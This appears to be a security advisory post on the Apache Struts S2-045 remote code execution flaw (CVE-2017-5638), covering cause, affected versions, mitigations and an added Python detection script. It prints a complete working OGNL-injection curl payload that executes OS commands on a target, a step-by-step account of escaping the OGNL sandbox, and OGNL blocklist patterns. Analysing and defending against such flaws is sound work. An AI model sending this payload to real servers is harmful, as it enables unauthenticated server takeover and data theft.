CVE-2017-5638 is a critical remote code execution flaw in Apache Struts 2 that stems from incorrect exception handling in the Jakarta Multipart parser. Struts hands a request to that parser whenever its `Content-Type` header contains the substring `multipart/form-data`. If the parser then rejects the header, the error message it raises embeds the raw header value, and Struts passes that message through its localized-text lookup, which evaluates OGNL expressions written as `%{...}`. Instead of being treated as an opaque string, the attacker-controlled header value is therefore handed to the OGNL interpreter. OGNL is the expression language Struts uses internally; it can instantiate classes, call static and instance methods and reach the application context, so an attacker who injects an expression into the header gets it evaluated server-side. The result is operating-system command execution with the privileges of the process running the Struts application. The `Content-Type` header is the vector exploited in the wild, but NVD notes that crafted `Content-Disposition` and `Content-Length` headers reach the same error path.
Platform: Apache Struts 2
Version: 2.3.5 – 2.3.31 and 2.5 – 2.5.10 (fixed in 2.3.32 and 2.5.10.1)
Vulnerability: Remote Code Execution (Apache security bulletin S2-045)
Severity: Critical
Date: 2017-03-07
Status: Patch available
What Undercode Say:
```bash
# Proof-of-concept request: the entire OGNL chain rides in the Content-Type header,
# and the command output ('id' here) comes back in the HTTP response body.
curl -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" http://target.com/upload.action
```
How Exploit:
Craft a `Content-Type` header whose value is an OGNL expression. The expression starts by assigning the string `'multipart/form-data'` to a throwaway variable; that is not decoration, it is what makes Struts' substring check route the request to the Jakarta parser, which then fails on the malformed header and reflects it into the evaluated error message. The next clauses lift the OGNL sandbox, either by overwriting `_memberAccess` with `DEFAULT_MEMBER_ACCESS` or, where that variable is unavailable, by clearing OgnlUtil's excluded-class and excluded-package lists and setting the context's member access directly. With the sandbox gone, the expression picks `cmd.exe /c` or `/bin/bash -c` based on `os.name`, starts the command through `java.lang.ProcessBuilder`, and copies its output into the servlet response stream, so the attacker reads the result in the HTTP response. Any Struts action URL works as the endpoint; it does not have to be one that handles uploads. Each request runs one command; a reverse shell is one command away, but the proof of concept itself returns output rather than opening an interactive session.
Protection from this CVE
Upgrade Struts to 2.3.32 or 2.5.10.1, the releases that fix the error-message handling; check the `struts2-core-*.jar` in each application's `WEB-INF/lib` rather than trusting a build manifest. If an upgrade cannot ship immediately, apply Apache's documented workaround: a Servlet filter that rejects any request whose `Content-Type` is not a well-formed `multipart/form-data` value before Struts sees it, or switch away from the Jakarta parser. WAF rules matching `%{`, `${` or `#cmd=` in request headers catch the public payloads, but they are a blocklist and variants have been written around them, so treat them as defense in depth, not as the fix. Disabling unused upload forms does not close the path on its own, because Struts wraps any request whose `Content-Type` contains `multipart/form-data` regardless of which action is targeted.
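As an added example (not code from the original post or from the Struts project), the following Python script ties the exploit mechanics and the protection advice above together: it decides whether a struts2-core version string falls in the affected range, and it classifies a raw request the way the S2-045 workaround filter would, rejecting any request that would reach the Jakarta parser with a `Content-Type` that is not well-formed `multipart/form-data`, while separately flagging the OGNL markers a WAF signature would look for in the three headers NVD names. The multipart grammar, the marker list and the three sample requests are this example's own assumptions, constructed for illustration.

```python
"""Triage helpers for Apache Struts S2-045 (CVE-2017-5638).

Added example, not code from the original post or from the Struts project.
It implements two defensive checks: (1) is the deployed struts2-core version
inside the affected range, and (2) does a request reach the Jakarta multipart
parser with a header value the parser would echo into an error message that
Struts then evaluates as OGNL.  The sample requests are constructed.
"""
import re

# Affected ranges from the advisory: 2.3.5 - 2.3.31 and 2.5 - 2.5.10.
VULNERABLE_RANGES = (((2, 3, 5), (2, 3, 31)), ((2, 5, 0), (2, 5, 10)))


def parse_version(version):
    """'2.5.10.1' -> (2, 5, 10, 1); pad to three parts so '2.5' == 2.5.0."""
    parts = tuple(int(p) for p in version.strip().split("."))
    return parts + (0,) * (3 - len(parts))


def is_vulnerable_version(version):
    """True if a struts2-core version string falls inside an affected range.

    Tuple comparison handles the four-part fix release: (2, 5, 10, 1) sorts
    above (2, 5, 10), so 2.5.10.1 is reported as fixed.
    """
    ver = parse_version(version)
    return any(lo <= ver <= hi for lo, hi in VULNERABLE_RANGES)


# Struts hands a request to the Jakarta parser when Content-Type *contains*
# this substring, which is why the public payload opens with
# (#_='multipart/form-data') instead of starting with the media type.
MULTIPART_TRIGGER = "multipart/form-data"

# Assumed grammar for a legitimate multipart Content-Type: the media type plus
# a boundary parameter (RFC 2046 allows up to 70 chars of a restricted set),
# optionally a charset.  Anything else is rejected before the parser sees it.
WELL_FORMED_MULTIPART = re.compile(
    r"^multipart/form-data"
    r"(?:\s*;\s*(?:boundary=(?:\"[^\"]{1,70}\"|[0-9A-Za-z'()+_,\-./:=?]{1,70})"
    r"|charset=[0-9A-Za-z\-_]+))+\s*$",
    re.IGNORECASE,
)

# Headers NVD lists as reflected into the evaluated error message.
REFLECTED_HEADERS = ("content-type", "content-disposition", "content-length")

# Blocklist view (what a typical WAF rule matches): OGNL delimiters and the
# identifiers the public payloads rely on.  Assumed list for this example.
OGNL_MARKERS = re.compile(
    r"%\{|\$\{|#_memberAccess|#cmd=|@ognl\.OgnlContext|@java\.lang\.", re.IGNORECASE
)


def parse_headers(raw_request):
    """Return {lowercased name: value} for the header block of a raw request."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def find_ognl_markers(headers):
    """Names of reflected headers whose value carries an OGNL marker."""
    return [h for h in REFLECTED_HEADERS if h in headers and OGNL_MARKERS.search(headers[h])]


def classify_request(raw_request):
    """Return 'block', 'alert' or 'pass' for one raw HTTP request.

    'block': Content-Type contains multipart/form-data (so Struts would invoke
             the Jakarta parser) but is not well-formed.  This is the allow-list
             check of the S2-045 workaround filter; it needs no signature.
    'alert': a reflected header carries a known OGNL marker even though the
             request would not take the multipart path; worth logging.
    'pass':  nothing suspicious.
    """
    headers = parse_headers(raw_request)
    ctype = headers.get("content-type", "")
    if MULTIPART_TRIGGER in ctype.lower() and not WELL_FORMED_MULTIPART.match(ctype):
        return "block"
    if find_ognl_markers(headers):
        return "alert"
    return "pass"


# --- constructed sample traffic (not captured from a real host) -------------
BENIGN_UPLOAD = (
    "POST /upload.action HTTP/1.1\r\nHost: app.example\r\n"
    "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryq1w2e3\r\n"
    "Content-Length: 256\r\n\r\n"
)
# Shape of the public S2-045 payload with the command chain shortened.
S2_045_PROBE = (
    "POST /upload.action HTTP/1.1\r\nHost: app.example\r\n"
    "Content-Type: %{(#_='multipart/form-data').(#cmd='id')"
    ".(#p=new java.lang.ProcessBuilder({'/bin/bash','-c',#cmd})).(#p.start())}\r\n"
    "Content-Length: 0\r\n\r\n"
)
# Same delimiter family in another reflected header, on a non-multipart POST.
ODD_DISPOSITION = (
    "POST /login.action HTTP/1.1\r\nHost: app.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Disposition: ${#cmd='id'}\r\n\r\n"
)

if __name__ == "__main__":
    for v in ("2.3.31", "2.3.32", "2.5", "2.5.10", "2.5.10.1"):
        print(v, "vulnerable" if is_vulnerable_version(v) else "fixed/unaffected")
    for name, req in (("benign", BENIGN_UPLOAD), ("probe", S2_045_PROBE), ("odd", ODD_DISPOSITION)):
        print(name, classify_request(req))
```

Running it prints a verdict per sample: the probe is blocked by the allow-list check alone, without any signature, while the `${...}` in a `Content-Disposition` header on a non-multipart POST only raises an alert. That gap is the practical difference between the workaround filter and a WAF rule, and it is why the version check, not either header check, is the one that tells you the exposure is gone.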
Impact:
Arbitrary operating-system command execution with the privileges of the servlet container process, from a single unauthenticated HTTP request. From there: complete compromise of the server, theft of application data and credentials, and a foothold for reaching internal networks the server can talk to.
Sources:
NVD: nvd.nist.gov (CVE-2017-5638); Apache Struts security bulletin S2-045

